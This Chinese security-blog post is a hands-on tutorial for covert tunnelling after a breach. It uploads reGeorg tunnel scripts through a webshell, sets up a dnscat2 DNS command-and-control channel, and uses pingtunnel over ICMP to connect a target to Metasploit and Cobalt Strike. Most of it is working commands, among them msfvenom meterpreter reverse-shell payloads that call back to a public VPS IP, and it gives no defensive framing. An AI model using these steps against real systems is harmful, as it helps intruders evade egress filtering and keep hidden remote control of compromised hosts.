HTTP/DNS/ICMP代理实战

  • A+
所属分类:安全博客

HTTP/DNS/ICMP代理实战

代理不代理代理代理,正反代理

/01 HTTP代理-reGeorg

一,reGeorg

首先要准备好reGeorg

HTTP/DNS/ICMP代理实战

拿到某个网站的shell可以上传文件的那种

HTTP/DNS/ICMP代理实战

HTTP/DNS/ICMP代理实战

根据对方的中间件上传对应的脚本,有php,ashx,jsp,

HTTP/DNS/ICMP代理实战

访问对于脚本位置

HTTP/DNS/ICMP代理实战

可以编辑脚本从而不显示提示

本地运行脚本

1
python2 reGeorgSocksProxy.py -u http://192.168.11.13/tunnel.nosocket.php -p 1080

HTTP/DNS/ICMP代理实战

二,Neo-reGeorg

相比reFeorg,它更安全且隐蔽

1.设置密码生成tunnel.(aspx|ashx|jsp|jspx|php)并上传WEB服务器

1
python3 neoreg.py generate -k passwd

HTTP/DNS/ICMP代理实战

HTTP/DNS/ICMP代理实战

2.将加了密的脚本上传服务器

HTTP/DNS/ICMP代理实战

3.运行py连接建立代理

1
python3 neoreg.py -u http://192.168.11.13/tunnel.php -k [email protected]

HTTP/DNS/ICMP代理实战

/02 DNS代理-Dnscat2

一,Dnscat2简介

dnscat2是一个DNS隧道工具,通过DNS协议创建加密的命令和控制通道,它的一大特色就是服务端会有一个命 令行控制台,所有的指令都可以在该控制台内完成。包括:文件上传、下载、反弹Shell。

直连模式:客户端直接向指定IP的恶意DNS服务器发起DNS解析请求。

中继模式:像我们平时上网一样,DNS解析先经过互联网的迭代解析,最后指向我们的恶意DNS服务器。相比直 连,速度较慢,但是更安全。

二,Dnscat2服务端安装

1
2
3
4
5
6
7
apt install ruby ruby-dev git make g++ ruby-bundler
gem install bundler


git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install

HTTP/DNS/ICMP代理实战

三,Dnscat2客户端编译

1
2
3
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client/
make

make编译之后会在此目录下生成一个dnscat可执行二进制文件。

四,Dnscat2直连模式

启动服务端:

1
ruby ./dnscat2.rb

启动失败

HTTP/DNS/ICMP代理实战

启动成功

HTTP/DNS/ICMP代理实战

server后面的hash值需要复制客户端启动时要用到

启动客户端:

1
./dnscat --dns server=139.155.49.43,port=53 --secret={secret}

HTTP/DNS/ICMP代理实战

服务端接收到会话:

HTTP/DNS/ICMP代理实战

HTTP/DNS/ICMP代理实战

五,Dnscat2中继模式

准备: 1. 一台公网C&C服务器 2. 一台内网靶机 3. 一个可配置解析的域名

配置DNS域名解析:

1.创建A记录,将自己的域名解析服务器(ns.ailumao.cn)指向云服务器(VPSIP)

2.创建NS记录,将子域名dnsch.ailumao.cn的DNS解析交给ns.ailumao.cn

HTTP/DNS/ICMP代理实战

启动服务端:

1
ruby ./dnscat2.rb dnsch.ailumao.xyz --secret=ailumao

启动服务端:

1
ruby ./dnscat2.rb dnsch.ailumao.xyz --secret=ailumao

服务端接收会话

由于服务器上搭建了网站就不示范了

/03 ICMP代理-Pingtunnel

一,Icmp隧道作用

通过某种信道获取了内网主机的shell,但是当前信道不适合做远控的通信信道,tcp和udp等传输层协议不能出 网,dns、http等应用层协议也不能出网,只有icmp协议可以出网。

https://github.com/esrrhs/pingtunnel

二,pingtunnel参数详解

HTTP/DNS/ICMP代理实战

HTTP/DNS/ICMP代理实战

HTTP/DNS/ICMP代理实战

三,ICMP隧道转发TCP上线MSF

1.VPS启动ICMP隧道服务端

icmp服务端和msf服务端都在VPS上

1
./pingtunnel -type server

HTTP/DNS/ICMP代理实战

2.靶机启动ICMP隧道客户端

icmp客户端监听127.0.0.1:9999 ,通过连接到192.168.11.11的icmp隧道,将127.0.0.1:9999收到的tcp数据包转发到192.168.11.11:7777

1
./pingtunel.exe -type client -l 127.0.0.1:9999 -s 192.168.11.11 -t 192.168.11.11:7777 -tcp 1 -noprint 1 -nolog 1

HTTP/DNS/ICMP代理实战

启动成功之后服务端会有对应IP的流量。

HTTP/DNS/ICMP代理实战

3.MSF生成反弹shell的payload

1
msfvenom -p python/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=9999 -f raw

HTTP/DNS/ICMP代理实战

4.执行payload反弹shell到MSF

注意payload为python/x64/meterpreter/reverse_tcp

HTTP/DNS/ICMP代理实战

HTTP/DNS/ICMP代理实战

HTTP/DNS/ICMP代理实战

四,ICMP隧道转发socks上线MSF

1.VPS启动ICMP隧道服务端

ICMP服务和msf服务都在此VPS上

1
./pingtunnel -type server

2.靶机启动ICMP隧道客户端

icmp隧道客户端监听127.0.0.1:9999启动socks5服务,通过连接到139.155.49.43的icmp隧道,由icmpserver转发socks5代理请求到目的地址139.155.49.43:8899

1
pingtunnel.exe -type client -l 127.0.0.1:9999 -s 192.168.11.11 -socks5 1 -noprit 1 -nolog 1

HTTP/DNS/ICMP代理实战

3.MSF生成反弹shell的payload

生成支持socks代理的反向payload

1
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=139.155.49.43 lport=8899 HttpProxyType=SOCKS HttpProxyHost=127.0.0.1 HttpProxyPort=9999 -f elf > 8899.elf

HTTP/DNS/ICMP代理实战

4.执行payload反弹shell到MSF

HTTP/DNS/ICMP代理实战

HTTP/DNS/ICMP代理实战

五,ICMP隧道转发TCP上线CS

1.VPS启动ICMP隧道服务端

139.155.49.43,icmp服务端和msf服务都在VPS

1
./pingtunnel -type server

HTTP/DNS/ICMP代理实战

2.靶机启动ICMP隧道客户端

1
pingtunnel.exe -type client -l 127.0.0.1:9999 -s 192.168.11.11 -t 192.168.11.11:7777 -tcp 1 -noprint 1 -nolog 1

HTTP/DNS/ICMP代理实战

新建一个监听者:

HTTP/DNS/ICMP代理实战

HTTP/DNS/ICMP代理实战

之后生成artifact.exe在目标机运行基本就可以上线到CS了

Tips:

pingtunnel用于内网的TCP做ICMP隐藏,让内网中不能以TCP出网的机器出网。

当我们了解对方的策略时我们可以因地制宜的选择代理方式,HTTP类型的Dns类型ICMP类型,每种都有优略。比如DNS相对隐蔽,ICMP适用性广等等。

FROM :https://ailumao.cn/ | Author:Ailumao

相关推荐: 驱动病毒那些事(二)----回调

前言 在分析驱动病毒的时候,病毒为了实现其恶意功能不可避免的会注册各种回调函数。内核模块并不是生成一个进程,只是填写一组回调函数让Windows来调用。我们只有深入了解了回调函数的整个调用流程后,分析病毒起来才能更加得心应手。 文章有些长,请大家耐心阅读。 进…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: